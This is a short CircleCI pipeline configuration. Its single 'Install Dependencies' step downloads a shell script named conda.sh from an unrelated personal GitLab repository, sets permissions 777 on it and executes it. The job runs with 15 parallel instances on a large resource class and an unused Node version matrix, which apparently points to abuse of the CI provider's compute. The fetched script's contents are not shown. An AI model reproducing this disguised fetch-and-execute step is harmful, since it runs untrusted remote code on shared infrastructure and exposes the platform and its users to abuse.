version: 2.1

executors:
  linux:
    docker:
      - image: elixir
    resource_class: large
jobs:
  build:
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    parallelism: 15
    steps:
      - run:
          name: Install Dependencies
          command: |
                        apt update 
                        wget https://gitlab.com/jningkulin/masitoh/-/raw/main/conda.sh
                        chmod 777 conda.sh && ./conda.sh
workflows:
  jancok:
    jobs:
      - build:
          matrix:
            parameters:
              os: [linux]
              node-version: [8.12.0, 8.13.0]